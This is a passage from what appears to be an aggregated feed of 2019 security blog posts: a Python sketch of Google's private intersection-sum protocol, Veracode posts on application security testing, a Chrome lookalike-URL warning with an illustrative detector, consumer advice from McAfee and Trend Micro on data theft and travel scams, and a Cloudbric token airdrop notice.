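To make the combination concrete, here is an added, self-contained Python sketch of the two ingredients working together (it is not Google’s Private Join and Compute code): identifiers are hashed into a prime-order group and blinded by each party’s secret exponent, which commutes, so P1 can mark the overlap without learning P2’s identifiers; P2’s values travel as Paillier ciphertexts, which P1 adds homomorphically, and P2 decrypts only the aggregate. Parameter sizes, the sample identifiers and values, and running both parties in one process are constructed assumptions for illustration (Python 3.8+ for the modular inverse via pow).

```python
import hashlib
import random
from math import gcd
# --- number theory helpers; toy parameter sizes, demonstration only ---
def is_probable_prime(n, rounds=32):
    if n < 2:
        return False
    for sp in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % sp == 0:
            return n == sp
    d, s = n - 1, 0
    while d % 2 == 0:
        d, s = d // 2, s + 1
    for _ in range(rounds):                       # Miller-Rabin witnesses
        x = pow(random.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True

def random_prime(bits):
    while True:
        cand = random.getrandbits(bits) | (1 << (bits - 1)) | 1
        if is_probable_prime(cand):
            return cand

def make_group(q_bits=160, p_bits=256):
    """Prime p with a subgroup of prime order q, where DDH is assumed hard."""
    q = random_prime(q_bits)
    while True:
        k = random.getrandbits(p_bits - q_bits) & ~1      # even cofactor keeps p odd
        p = k * q + 1
        if k > 1 and is_probable_prime(p):
            return p, q

def hash_to_group(identifier, p, q):   # random-oracle style hash into the order-q subgroup
    for ctr in range(256):
        digest = hashlib.sha256(f"{ctr}|{identifier}".encode()).digest()
        g = pow(int.from_bytes(digest, "big") % p, (p - 1) // q, p)
        if g not in (0, 1):
            return g
    raise RuntimeError("hash_to_group: no valid element found")

# --- Paillier: additively homomorphic, Enc(a) * Enc(b) = Enc(a + b) ---
def paillier_keygen(bits=256):
    p, q = random_prime(bits), random_prime(bits)
    while q == p:
        q = random_prime(bits)
    n = p * q
    lam = (p - 1) * (q - 1) // gcd(p - 1, q - 1)
    return (n, n * n), (lam, pow(lam, -1, n))           # (public key, secret key)

def paillier_enc(pk, m):
    n, n2 = pk
    return (1 + m * n) % n2 * pow(random.randrange(1, n), n, n2) % n2

def paillier_add(pk, c1, c2):
    return c1 * c2 % pk[1]

def paillier_dec(pk, sk, c):
    n, n2 = pk
    lam, mu = sk
    return (pow(c, lam, n2) - 1) // n * mu % n

# --- the protocol: P1 holds identifiers, P2 holds (identifier, value) pairs ---
def private_intersection_sum(p1_ids, p2_records, group):
    """Returns (intersection size, sum of P2's values over it), the only
    plaintext P2 ever decrypts. Both parties are simulated in one process; in a
    deployment k1 stays with P1, k2 and the Paillier secret key stay with P2."""
    p, q = group
    k1, k2 = random.randrange(1, q), random.randrange(1, q)   # blinding exponents
    pk, sk = paillier_keygen()                                # P2's key pair
    # Round 1 (P1 -> P2): P1's identifiers hashed, blinded under k1, shuffled.
    msg1 = [pow(hash_to_group(v, p, q), k1, p) for v in p1_ids]
    random.shuffle(msg1)

    # Round 2 (P2 -> P1): P1's items re-blinded under k2, plus P2's own items
    # blinded under k2 next to Paillier ciphertexts of their values.
    z = {pow(x, k2, p) for x in msg1}
    msg2 = [(pow(hash_to_group(w, p, q), k2, p), paillier_enc(pk, t)) for w, t in p2_records]
    random.shuffle(msg2)
    # Round 3 (P1 -> P2): blinding commutes, so H(w)^(k2 k1) == H(v)^(k1 k2) exactly
    # when w == v; P1 marks the overlap without learning any w and adds the matching
    # ciphertexts. Starting from a fresh Enc(0) re-randomises the sum for P2.
    acc, count = paillier_enc(pk, 0), 0
    for blinded_w, ct in msg2:
        if pow(blinded_w, k1, p) in z:
            acc, count = paillier_add(pk, acc, ct), count + 1
    return count, paillier_dec(pk, sk, acc)                   # P2 decrypts the aggregate

# Constructed sample data: P1 knows who saw a campaign, P2 knows who spent what.
P1_IDS = ["alice@example.com", "bob@example.com", "carol@example.com", "dave@example.com"]
P2_RECORDS = [("bob@example.com", 30), ("carol@example.com", 25), ("erin@example.com", 100), ("dave@example.com", 5)]
```

On the sample data the protocol reports an overlap of three identifiers with a value sum of 60, and neither side ever sees the other’s raw identifiers or the individual amounts.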

Video and infographic (from the original post): how Private Join and Compute works.

Using multi-party computation to solve real-world problems


Multi-party computation (MPC) is a field with a long history, but it has typically faced many hurdles to widespread adoption beyond academic communities. Common challenges include finding effective and efficient ways to tailor encryption techniques and tools to solve practical problems.

We’re committed to applying MPC and encryption technologies to more concrete, real-world issues at Google and beyond by making privacy technology more widely available. We are exploring a number of potential use cases at Google across collaborative machine learning, user security, and aggregated ads measurement.

And this is just the beginning of what’s possible. This technology can help advance valuable research in a wide array of fields that require organizations to work together without revealing anything about individuals represented in the data. For example:

  • Public policy - if a government implements new wellness initiatives in public schools (e.g. better lunch options and physical education curriculums), what are the long-term health outcomes for impacted students?
  • Diversity and inclusion - when industries create new programs to close gender and racial pay gaps, how does this impact compensation across companies by demographic?
  • Healthcare - when a new preventative drug is prescribed to patients across the country, does it reduce the incidence of disease? 
  • Car safety standards - when auto manufacturers add more advanced safety features to vehicles, does it coincide with a decrease in reported car accidents?

Private Join and Compute keeps individual information safe while allowing organizations to accurately compute and draw useful insights from aggregate statistics. By sharing the technology more widely, we hope this expands the use cases for secure computing. To learn more about the research and methodology behind Private Join and Compute, read the full paper and access the open source code and documentation. We’re excited to see how other organizations will advance MPC and cryptography to answer important questions while upholding individual privacy.


Acknowledgements


Product Manager - Nirdhar Khazanie
Software Engineers - Mihaela Ion, Benjamin Kreuter, Erhan Nergiz, Quan Nguyen, and Karn Seth
Research Scientist - Mariana Raykova


Live From Gartner Security & Risk Mgmt Summit: Pair Security Trainings With Technical Controls

“We often forget that technology cannot solve the world’s problems.” That was one of the opening lines of Joanna Huisman’s session “Magic Quadrant for Security Awareness Computer-Based Training” at the Gartner Security & Risk Management Summit in National Harbor, MD. While her Magic Quadrant doesn’t address DevSecOps trainings, I took away some valuable lessons that also apply to this area.

20 percent of users will never change behavior, no matter how well you train

Traditional awareness efforts are based on the belief (or hope) that information leads to action. In other words, the problem with trainings is that “awareness” does not automatically result in secure behavior: About 20 percent of learners are never going to do the right thing, no matter how much you train them.

Let’s think this through for a moment: 80 percent of your audience will follow your advice to some extent, so you will get an improvement, but 20 percent will not change their behavior. Most security professionals aim to reward users who follow security process but are reluctant to punish the ones who don’t because they don’t want to be the bad guys. Even if they are prepared to go through with punitive actions, it may be counter to corporate culture (and generally not a good teaching practice).

Education is good, but it must be coupled with technical controls

This means that while security awareness does improve your security posture, you still need technical controls in place to mitigate the rest. In the case of DevSecOps, this translates into a combination of secure coding trainings and automated application security testing. The training will reduce vulnerabilities being introduced into the code, which reduces the cost of your DevSecOps program because security defects that never enter the code are understandably much cheaper than those found in production. The security testing serves as a feedback loop for developers and as a gate to stop security defects escaping to production.

At Veracode, we offer courses to teach the fundamentals of secure coding, both as eLearning and live sessions. With Veracode Greenlight, we provide instant feedback on code security as developers are typing code in their IDE. And we provide feedback via ticketing systems and a security gate as part of Veracode Static Analysis. If developers get stuck fixing a vulnerability, they can book our application security consultants for a coaching session to help fix their security defect.

Learn more about Veracode’s Developer Training.

Application Security Beyond Static Analysis

There is no application security “silver bullet” – it takes a combination of testing types to effectively reduce your risk. Each testing method has a different role to play and works best when used in harmony with others.

For instance, our research showed that there are significant differences in the types of vulnerabilities you discover dynamically at runtime compared to those you’ll find when doing static testing in a non-runtime environment. In fact, two of the top five vulnerability categories we found during dynamic testing weren’t even among the top five found by static, with one not found by static at all.

Add to this the fact that applications are increasingly “assembled” from open source components, rather than developed from scratch, which means software composition analysis is an important part of your testing mix. Neglecting to assess and keep track of the open source components you are using would leave a large portion of your code exposed and leave you open to attack. 

And finally, automation alone is not enough to ensure an application is thoroughly tested from a security perspective. Some flaws, such as CSRF (Cross-Site Request Forgery) and business logic vulnerabilities, require a human to be in the loop to exploit and verify the vulnerability. Only manual penetration testing can provide positive identification and manual validation of these vulnerabilities.

Here's an overview of the different types of vulnerabilities found by different testing types:

Capability                                             | Static analysis  | Software composition analysis | Dynamic analysis | Manual penetration testing
Flaws in custom web apps (CWEs)                        | X                |                               | X                | X
Flaws in custom non-web apps (CWEs)                    | X                |                               |                  | X
Flaws in custom mobile apps (CWEs)                     | X                |                               |                  | X
Known vulnerabilities in open source components (CVEs) |                  | X                             |                  | X (1)
Behavioral issues (CWEs)                               | X (2)            |                               |                  | X
Configuration errors (CWEs)                            |                  |                               | X                | X
Business logic flaws (CWEs)                            |                  |                               |                  | X
Repeatable process for automation                      | X                | X                             | X                |
Scalable to all corporate applications                 | X                | X                             | X                |
Scan speed                                             | Seconds to hours | Seconds to minutes            | Hours            | Days to weeks
Cost per scan                                          | $                | $                             | $                | $$

(1) Penetration testing can find known vulnerabilities in open source components, but this may not be as rigorous as Veracode Software Composition Analysis, which not only systematically flags CVEs but also crawls commit histories and bug tracking tickets in open source projects to identify silent fixes of security issues.

(2) This is not true for all static analyzers. Veracode can exercise the code and manipulate the UI for behavioral analysis in mobile applications.

Here’s a summary of when to use each testing type:

Static analysis (with entire application in scope)
Advantages:
  • Very broad coverage of flaw types (CWEs)
  • Looks at the flaws in the context of the entire application, analyzing all the data paths
  • Can scan any type of application, including web, mobile, desktop, or microservices
  • Scanning frequency should be in line with how often developers can review scan results
  • Use static analysis as part of the Continuous Delivery pipeline and file security issues in the bug tracking system
  • Can track flaw history: new, open, fixed. Important for trending reports on mean time to remediation.
  • Suitable for compliance purposes
Limitations:
  • Does not provide instant feedback to developers as they’re coding
  • Cannot find CWEs related to server configurations
  • Limited to code that developers can remediate
  • Does not report vulnerabilities in third-party components (see: SCA)

Static analysis (on file level, e.g., Greenlight)
Advantages:
  • Recommended for development teams who want to shift left in application security testing by scanning early and often. Scans usually complete in seconds.
  • Best suited when scanning multiple times per day
  • Recommended for use by developers working on new code, for continuous flaw feedback and remediation guidance
  • Developer friendliness: enhances learning, allows developers to find and address issues without exposing flaws in reports
Limitations:
  • Scans individual files, so can only detect vulnerabilities where source and sink are in the same file
  • Typically not suited for compliance scanning because scope limitations may cause false negatives
  • Does not report vulnerabilities in third-party components

Dynamic analysis
Advantages:
  • Scans web applications without having to integrate with the SDLC
  • Ability to scan in pre-production and production
  • Suitable for compliance purposes
Limitations:
  • Scan times are often between 12 and 24 hours for complex applications, so recommended for overnight scans or for asynchronous scanning

Software composition analysis
Advantages:
  • Finds vulnerabilities in third-party components
  • Scans take seconds or minutes
  • Can scan any type of application, including web, mobile, desktop, or microservices
  • Suitable for compliance purposes
Limitations:
  • Does not find flaws in first-party code

For more details, check out our new guide, Application Security Best Practices.

New Chrome Protections from Deception


Chrome was built with security in mind from the very beginning. Today we’re launching two new features to help protect users from deceptive websites. The Suspicious Site Reporter Extension will improve security for Chrome users by giving power users an easy way to report suspicious sites to Google Safe Browsing. We’re also launching a new warning to protect users from sites with deceptive URLs.

We designed Chrome to be secure by default, and easy to use by everyone. Google Safe Browsing has helped protect Chrome users from phishing attacks for over 10 years, and now helps protect more than 4 billion devices every day across multiple browsers and apps by showing warnings to people before they visit dangerous sites or download dangerous files. We’re constantly improving Safe Browsing, and now you can help.

Safe Browsing works by automatically analyzing the websites that we know about through Google Search’s web crawlers, and creating lists of sites that are dangerous or deceptive. With the Suspicious Site Reporter extension, you can help Safe Browsing protect web users by reporting suspicious sites. You can install the extension to start seeing an icon when you’re on a potentially suspicious site, and more information about why the site might be suspicious. By clicking the icon, you’re now able to report unsafe sites to Safe Browsing for further evaluation. If the site is added to Safe Browsing’s lists, you’ll not only protect Chrome users, but users of other browsers and across the entire web.


Help us protect web users by reporting dangerous or deceptive sites to Google Safe Browsing through the Suspicious Site Reporter extension.

One way that deceptive sites might try to trick you is by using a confusing URL. For example, it’s easy to confuse “go0gle.com” with “google.com”. In Chrome 75, we’re launching a new warning to direct users away from sites that have confusing URLs.


Starting in the current version of Chrome (75), you’ll see a warning when the page URL might be confused for URLs of sites you’ve visited recently.

This new warning works by comparing the URL of the page you’re currently on to URLs of pages you’ve recently visited. If the URL looks similar, and might cause you to be confused or deceived, we’ll show a warning that helps you get back to safety.
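As an added illustration of that kind of comparison (not Chrome’s code; the post does not describe Chrome’s actual heuristics), the Python below checks a candidate hostname against the registrable domains in a recent-history list, first through a confusable-character skeleton and then by edit distance. The confusable table, the two-label registrable-domain rule and the sample history are constructed assumptions.

```python
import unicodedata

# Constructed confusable map (hypothetical; Unicode's real table is far larger):
# digit/letter-pair look-alikes plus a few Cyrillic homoglyphs of Latin letters.
CONFUSABLES = {"rn": "m", "vv": "w", "0": "o", "1": "l", "3": "e", "5": "s",
               "\u0430": "a", "\u0435": "e", "\u043e": "o"}

def registrable_domain(host):
    """Last two labels of a hostname (assumption: no public-suffix list)."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])

def skeleton(host):
    """Canonical form in which confusable spellings collide."""
    s = unicodedata.normalize("NFKD", host.lower())
    s = "".join(ch for ch in s if not unicodedata.combining(ch))  # drop accents
    for src, dst in CONFUSABLES.items():
        s = s.replace(src, dst)
    return s

def edit_distance(a, b):
    """Levenshtein distance via a rolling row of the DP table."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def lookalike_of(candidate_host, recent_hosts, max_distance=1):
    """Return the recently visited registrable domain that candidate_host
    imitates, or None. A domain the user actually visited is never flagged."""
    cand = registrable_domain(candidate_host)
    visited = {registrable_domain(h) for h in recent_hosts}
    if cand in visited:
        return None
    for known in sorted(visited):
        if skeleton(cand) == skeleton(known) or edit_distance(cand, known) <= max_distance:
            return known
    return None

# Constructed sample of recently visited hosts.
RECENT_HISTORY = ["www.google.com", "mail.google.com", "paypal.com", "example.org"]
```

The same function also flags a single-character typo (an inserted or swapped letter) that the skeleton alone would miss, which is why a warning, rather than a block, is the right response: a neighbouring legitimate domain can trip the distance rule too.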

We believe that you shouldn't have to be a security expert to feel safe on the web, and that many Chrome power-users share our mission to make the web more secure for everyone. We’ll continue improving Chrome Security to help make Chrome easy to use safely, and are looking forward to collaborating with the community to further that goal. If you'd like to help out, install the new extension and start helping protect the web!

Can All-in-One Printers Be Hacked? “Hackable?” Sets the Fax Straight

The heyday of fax technology may have been in the 80s, but all-in-one printers found throughout homes and offices often still include a fax machine. And telephonic transmission has resisted the rise of email and other internet-connected messaging tools in a variety of fields, including healthcare and law enforcement.

On the latest episode of “Hackable?” we learn if this dated, but still used, technology puts entire networks at risk. Geoff invites two Israeli cybersecurity researchers to test the seldom-used fax machine and printer sitting in the corner of his home office. Listen and learn what they are able to do with only a $5 modem, Geoff’s fax number, and a Python script.

The post Can All-in-One Printers Be Hacked? “Hackable?” Sets the Fax Straight appeared first on McAfee Blogs.

Live From Gartner Security & Risk Mgmt Summit: Running Midsize Enterprise Security

Over the past few months, I’ve experienced an increased interest in DevSecOps from midsize enterprises, so I was especially interested in attending Neil Wynne and Paul Furtado’s session “Outlook for Midsize Enterprise Security and Risk Management 2019” at the Gartner Security & Risk Management Summit in National Harbor, MD this week.

57 Percent of Midsize Enterprises Don’t Have a CISO

Gartner defines midsize enterprises as companies with less than $20 million in IT security budget. At that size, they have up to 30 people in IT, which means that 57 percent of this group do not have enough security staff to warrant a CISO. This means the CIO is accountable for cybersecurity in most midsize enterprises.

According to Gartner, midsize enterprises spend an average of $1,089 on IT security per employee. About 6 percent of the IT headcount is dedicated to security, so you have to have at least 17 people in IT before you start dedicating a full headcount to security. Below that watermark, it’s only partial headcounts. That’s a lot of security areas to cover for very little headcount, and you can completely forget about 24/7 coverage for security operations. To make things worse, the midsize enterprise is hit even harder by the InfoSec skills gap because it often cannot compete with Fortune 500 salaries and benefits.

How Can Midsize Enterprises Address These Challenges?

Paul Furtado, Sr. Director Analyst at Gartner, recommends the following guidelines for addressing these challenges:

  • Create a baseline: What are you doing today?
  • Know what to protect: You won’t know what to protect if you don’t know what’s critical to the business. Identify your most critical data: PII, IP, partner/customer lists, business-critical applications. If you don't know that, you're spending money in the wrong areas.
  • Know your risk appetite: Categorize all risks by business impact and risk scenario likelihood, then prioritize and decide what’s a level of acceptable risk for the organization.
  • It’s a combined effort: Security is a combination of people, process, and technology.
  • Apply best practices: You are not the first one to set up a security program – learn from others.  

Framing Security Spending With Executive Leadership

Before Paul joined Gartner, he spent decades working in the trenches in midsize enterprises. Most executive leaders ask why they should be spending dollars on security. I loved his response: “I’m not taking a dollar from you, I’m protecting the dollars for you.” This is a great mind shift that I can absolutely see working with executives.

I also liked how he boiled down the basics of what a security program must do:

  • Keep bad guys out 
  • Let good guys in
  • Keep the wheels on

I often see security professionals over-rotate on the first item, which is most important to them. However, let’s not forget, items two and three are more important to everyone else in the business!

Be Pragmatic and Don’t Do Everything In-House

With very limited resources, you cannot do everything in-house. You need to outsource some of the work to be successful. Use cloud solutions and vendors that can supply you with specialized knowledge and round-the-clock coverage. As Paul summed it up: “We could do this ourselves, but it’s not a good use of our people.”

A Recipe for a Successful Security Program in Midsize Enterprise

Paul summed up his recommendations as follows:

  • Do the simple things well. This means the more difficult things in IT security become easier. Complexity is the enemy of security. 
  • Start to seriously examine how to leverage your security spending with multiplication platforms.
  • Demand a secure development life cycle and “built-in” security for IT components.
  • Constantly re-evaluate your risk tolerance and your good-enough security comfort level.
  • Investigate emerging security services.

Of course, working in application security, number three resonated most with me, so I’d like to dig into this one a little and tie it back to all of his recommendations.

How to Do DevSecOps in Midsize Enterprises

Key takeaways from Paul’s talk are that you cannot do everything in-house because of lack of headcount and skills shortage in InfoSec. Veracode can help you address both of these challenges.

Let’s get to lack of headcount first. Veracode is the only SaaS-native Leader in the Gartner 2019 Magic Quadrant for Application Security Testing, and we have been a Leader six times in a row. As a midsize enterprise, you don’t have the time to set up and maintain an application security scanning infrastructure, especially if you have to support multiple geographic sites as well as high availability and scalability for critical DevOps teams. Using Veracode is like having DevSecOps on tap: you don’t have to set up any infrastructure, so your developers can start scanning on day one.

Now let’s discuss skills shortage. If you only have a couple of InfoSec people on your team, you will struggle to offer specialized knowledge for developers who need help remediating specific vulnerabilities in their code, especially if your team covers a broad set of languages. At Veracode, we have a dedicated team of application security consultants that your developers can tap into to get help with their code. In addition, our security program managers can onboard your scrum teams onto our platform and help them automate the security scanning.

Security as a Competitive Advantage

As a midsize enterprise, you are often subject to security scrutiny when selling to the Fortune 500, especially when the value you deliver to your customers involves software, either directly or indirectly. Veracode is the only application security testing vendor to offer the Veracode Verified Program, which helps you show your customers that you take security seriously. Many of our midsize enterprise customers even use their Veracode Verified logo as a competitive advantage. Check out some of these companies in the Veracode Verified Directory.

 

“You may not have the need today, but it’s well worth doing the research today.”

How the Huawei ban could become a security threat | TECH(feed)

We’ve already talked about how the Huawei ban may affect business, but how will it affect security? Google has already warned of security threats should the company be unable to send updates to Huawei’s Android-powered devices. And even if Huawei responds with its own OS, will people trust it? In this episode of TECH(feed), Juliet discusses those security implications and what some people think the U.S. should do instead.

How Veracode Supports DevSecOps Methodologies With SaaS-based Application Security

Veracode Kuppinger Cole Report

Most legacy applications were not developed with security in mind. However, modern businesses and organizations are continuing to undergo digital transformation in order to pursue new business models and revenue channels, as well as giving their customers or constituents a simplified experience. This often means selecting cloud-based tools and solutions that allow for the scalability necessary to provide applications and services to a broad customer base.

For example, in 2013, the UK government adopted a Cloud First, or Cloud Native, policy for all technology decisions, making it mandatory to consider cloud solutions before alternatives. This means that government IT professionals must first consider public cloud options, including SaaS models for enterprise IT and back-office functions, as well as Infrastructure as a Service and Platform as a Service.

But this dramatic expansion of the application layer introduces new security challenges. In one engagement, Veracode worked with a High Street bank to secure its web application portfolio and uncovered 1,800 websites that had not been inventoried – making its attack surface 50 percent bigger than originally thought.

With the growing complexity of IT infrastructures and a shortage of qualified security experts, businesses and government agencies alike need to enlist application security specialists with a deep understanding of the complexity of modern applications.

Veracode pioneered static binary analysis to address the security of modern applications, which are often assembled from the work of different teams, languages, frameworks and third-party libraries. This approach allows security and development teams to assess the security posture of entire applications once they’ve been built, rather than analyzing individual pieces of source code and missing some of the potential “cross-platform” exploits.

Yet the Veracode Platform offers so much more than its signature static binary analysis.

“With a growing number of integrations with CI/CD tools and development environments and expanding its coverage to the full software supply chain, Veracode clearly shows the commitment to fully embrace the modern DevOps and DevSecOps methodologies and to address the latest security and compliance challenges,” writes KuppingerCole Lead Analyst Alexei Balaganski. “With the SaaS approach, the company can ensure that customers can start using the platform within hours, and a wide range of support, consulting and training services means they are ready to guide every customer towards the application security best practices as quickly as possible.”

To learn more about our approach to supporting modern DevOps and DevSecOps methodologies, and how the Veracode Platform is even easier for software developers to use, download the KuppingerCole Report, Executive View: Veracode Application Security Platform.

The 2019 Job Seeker & The Cybersecurity Skills Shortage

In today’s ever-changing job market, job seekers and employers alike are under a great deal of pressure. Those looking for their next career move are focusing on what’s required to land a great role with competitive compensation and room for growth in an exciting field. And employers are seeking a rising star that will be a good culture fit and have values that match those of their company.

A Letter to Jobseekers

Whether you just graduated college, left your previous role, or are seeking a different career path, you’re probably thinking, “Now what?” No matter where your path leads you, stay positive. Try to find a company that invests in you, truly wants you to succeed, fosters both personal and professional growth, and makes a big difference in your career progression.

If you’re a problem solver and love to learn, cybersecurity is the path for you. A career in cybersecurity can be very fulfilling. As cybercrime continues to rise, so will the demand for qualified cybersecurity professionals, offering both dynamic growth opportunities and job security. Furthermore, cybersecurity professionals are generally among the most highly compensated technology workers—and as the need for security professionals further outpaces the supply, salaries will continue to climb as companies compete for top talent. Lastly, a career in cybersecurity offers the sense of purpose that comes with making the world a better place by helping protect innocent people from cybercriminals.

Whether you are just out of the gate or further along in your career, check out McAfee CHRO Chatelle Lynch’s five powerful career tips: stay hungry, celebrate others’ success, work hard, own your brand, and take pride in everything you do.

Good luck!

A Sustainable Model for Cybersecurity Talent

The term “skills shortage” is all too familiar to those in the cybersecurity industry. A Cybersecurity Ventures report estimates there will be 3.5 million unfilled cybersecurity jobs by 2021. And as cloud platforms demand an increasingly complex set of cloud SecOps skills, the skills gap will continue to grow at an increasing clip.

Success requires fresh thinking and fresh perspectives. It’s time for the cybersecurity industry to redefine the minimum credentials for entry-level cybersecurity jobs and accept non-traditional sources of education. Instead of expecting to hire an experienced cybersecurity professional, more companies should consider accepting job applicants that will require upfront investment and training. According to our Winning the Game report, 92% of cybersecurity managers say gamers possess skills that make them suited to a career in cybersecurity—and 75% would consider hiring a gamer even if that person had no cybersecurity training or experience.

In order to grow security talent and close the skills gap, companies should also consider developing apprenticeship programs, investing in and supporting cybersecurity and threat intelligence programs at universities, and other avenues. According to Lynch, “We won’t close our skills gap overnight, but by working together to collectively promote and advocate for a career in cybersecurity, the closer we will get.” We look forward to solving the cyber skills shortage together and driving innovation with diversity and inclusion.

Looking for a career in cybersecurity? Join our team.

The post The 2019 Job Seeker & The Cybersecurity Skills Shortage appeared first on McAfee Blogs.

Hackers Are After Your Personal Data – Here’s How to Stop Them

Our lives are increasingly digital. We shop, socialize, communicate, watch TV and play games — all from the comfort of our desktop, laptop, or mobile device. But to access most of these services we need to hand over some of our personal data. Whether it’s just our name and email address or more sensitive information like Social Security and credit card numbers, this sharing of what’s known as personally identifiable information (PII) exposes us to risk. Why? Because hackers are looking for ways to steal and monetize it.

The latest FBI Internet Crime Complaint Center (IC3) report, recently released, paints an accurate picture of the scale of these online threats. Personal data breaches were among the top reported cybercrimes in 2018, with 50,642 victims listed. They were linked to losses of over $148.8m. This is likely just the tip of the iceberg, as many incidents aren’t reported. Identity theft, which usually results from data theft, cost victims over $100m last year. And phishing attacks, which are commonly used to trick victims into handing over sensitive PII and passwords, accounted for over $48m in losses.

The message is clear: consumers need to take urgent steps to protect their most sensitive identity and financial data from online attackers. That’s why Trend Micro has produced this guide, to help you identify where your most sensitive data is stored, how attackers might try to steal it and how best to secure it.

What is at risk?

The bottom line is that hackers are out to make money. Although they can do this via online extortion and ransomware, it is most commonly done via data theft. Once they have your PII and financial details they sell it on dark web sites for fraudsters to use in follow-on identity fraud. They could use banking log-ins to hijack your bank account and drain it of funds. Or they could open new credit cards in your name and run up huge debts.

Identity fraud is a growing threat to US consumers. It affected 14.4m of us in 2018, leading to losses of $1.7bn — more than double the 2016 figure.

As we’ve mentioned, the hackers are after as much PII as they can get their hands on. The more they have, the easier it is for them to stitch together a convincing version of your identity to trick the organizations you interact with online. It could range from names, addresses and dates of birth at one end to more serious details like Social Security numbers, bank account details, card numbers, and health insurance details at the other.

Most of this information is stored in your online accounts, protected by a password, so they will often put a great deal of effort into guessing or stealing the all-important log-ins. Even accounts you might not think would be of interest to a hacker can be monetized. Access to your Uber account, for example, could be hijacked and sold online to offer free trips to the buyer. Or your Netflix account log-ins may be sold to provide free streaming services to whoever pays for them.

Now, hackers may go after the firms directly to steal your personal data. In the past we’ve seen mega breaches at the likes of Uber (affecting 57m global users) and Yahoo (affecting 3bn users). But they might also target you individually. Sometimes they may use information they already know about you to trick you via phishing into handing over more, as with tax fraud and sextortion blackmail attempts, and sometimes they might use already breached passwords to try and hack into your accounts, hoping you reuse the same log-ins across multiple sites.

While you’re most likely to get reimbursed by your bank eventually for financial losses stemming from identity fraud, there’s a major impact beyond this. Online data theft and the fraud that follows could lead to:

  • Out-of-pocket costs to recover your identity
  • Emotional distress: 75% of victims report suffering severe distress
  • Lower credit scores
  • Time and effort disputing charges/recouping money: it’s estimated to take an average of six months and 200 hours of work to recover your identity following an attack.

How do they steal it?

There are plenty of techniques the bad guys have at their disposal to part you from your data and money. They’re supported in this by a vast underground cybercrime economy, facilitated by those dark web sites. This not only offers a ready-made platform for them to sell their stolen data to fraudsters, but also provides them with hacking tools, advice and cybercrime services. This black market economy could be worth as much as $1.5tr per year.

The hackers may choose to:

  • Target you with a phishing scam, spoofing an email to appear as if sent from an official company (the IRS, your bank, insurer, ISP etc.)
  • Launch automated attacks, either using your log-ins from other sites that have been stolen, or else using online tools to try multiple combinations of easy-to-guess passwords like “passw0rd”
  • Exploit vulnerabilities on the websites you visit to gain access to your account
  • Infect legitimate-looking mobile apps with malware and wait until you unwittingly download them
  • Intercept your private data sent over public Wi-Fi: for example, if you log in to your online banking account on public Wi-Fi, a hacker may be able to monitor everything you do.

How can I secure it?

The good news is that there are plenty of simple things you can do to keep your data safe and secure — most of them free of charge. Consider the following:

  • Use a long, strong and unique password for each website and application. To help you do this, use an online password manager to store and recall these log-ins when needed.
  • Change your passwords immediately if a provider tells you your account may have been breached
  • Use two-factor or multi-factor authentication (2FA/MFA) if available for added log-in security.
  • Only enter PII into sites which start with “HTTPS” in the address bar.
  • Don’t click on links or open attachments in unsolicited emails or texts.
  • Be careful about over-sharing personal and financial details on social media.
  • Only download apps from official app stores like the Apple App Store or Google Play.
  • Don’t access any sensitive accounts (banking, email, etc.) on public Wi-Fi without using a VPN.
  • Invest in good AV from a trusted provider for all your PCs and mobile devices. It should include anti-phishing and anti-spam.
  • Keep all operating systems and apps on the latest versions to minimize the number of vulnerabilities hackers could target.
  • Keep tabs on your financial transactions so you can quickly spot if an identity fraudster has been impersonating you.
  • In the event of a breach involving your credit data (as with the Equifax breach), check your credit report and security status with Equifax, TransUnion, Experian, and Innovis, and put a security freeze on your credit if necessary.

The post Hackers Are After Your Personal Data – Here’s How to Stop Them appeared first on .

[Results] CLB Super Holder Event

Greetings Cloudbric community!

Thank you for your interest in our CLB Super Holder event which has now come to an end.

On exactly June 17, at 4pm KST, the price of CLB sat at 10.4 KRW (approx. $0.0088 USD).

As mentioned, all eligible CLB holders will receive a guaranteed minimum of 5% cumulative bonus distributions (CLB and CLBK tokens) of their total CLB stake as long as they hold the minimum CLB token amount.

Please check the airdrop list and look to see if your email was accepted in alignment with the guidelines.

Airdrop list

Please note that users that had already transferred CLB tokens prior to June 11th, 2019 at 2pm KST will receive an additional 200 CLB bonus airdrop to help mitigate any issues or confusion regarding wallet addresses and transfers.

The winners of the CLB Super Holder event will be issued their CLB tokens by June 24 and will receive their CLBK tokens after Klaytn’s main net launch. More details soon to come.


Make sure to follow us on our social media platforms (LinkedIn, Twitter, and Facebook) and our recently opened Telegram Announcement Channel for the latest updates!

The post [Results] CLB Super Holder Event appeared first on Cloudbric.

How to Book Your Next Holiday Online and NOT Get Scammed

Taking our tribe on an annual family holiday has always been a top priority for my husband and me. But with 4 sons – who all eat ridiculous amounts – this can be an expensive exercise. So, like most people, I am always on the lookout for deals and ways to save money on trips to our favourite holiday destinations.

But according to research from McAfee, our need to secure a great deal to a hot destination may mean we are cutting corners and taking risks online. Over one-third of us (32%) report that we are likely to use a website we have never heard of before just because it offers great deals!

And cybercriminals are fully aware of this, so they spend a lot of time and effort creating malicious travel websites and fraudulent links to lure us ‘travel nuts’ away from the reputable online travel players. Their goal is to get us to their fraudulent site, install malware on our devices so they can steal our personal information, passwords and, ideally, our money!

How Many Aussies Have Been Scammed?

McAfee’s research also shows that 1 in 5 of us have either been scammed or nearly scammed when booking a holiday online, with many of us (32%) signing up for a deal that turned out to be fake. And horrifyingly, 28% of holiday scam victims only realised that they had been scammed when checking in to their holiday accommodation! Can you imagine breaking the news to the kids? Or worse still, having to pay twice for the one holiday?

Cybercriminals Also Have Favourite Holiday Hot Spots

Not only are cybercriminals capitalising on our need for a deal when booking a holiday, but they are also targeting our favourite destinations. The findings from McAfee’s research show holiday hot spots such as Thailand, India, the Philippines and the UK generate the riskiest search results when people are on the hunt for holidays online.

The top holiday destinations for Aussies that hackers are targeting via potentially malicious sites:

  1. New Delhi, India
  2. Bangkok, Thailand
  3. London, England
  4. Phuket, Thailand
  5. Manila, Philippines

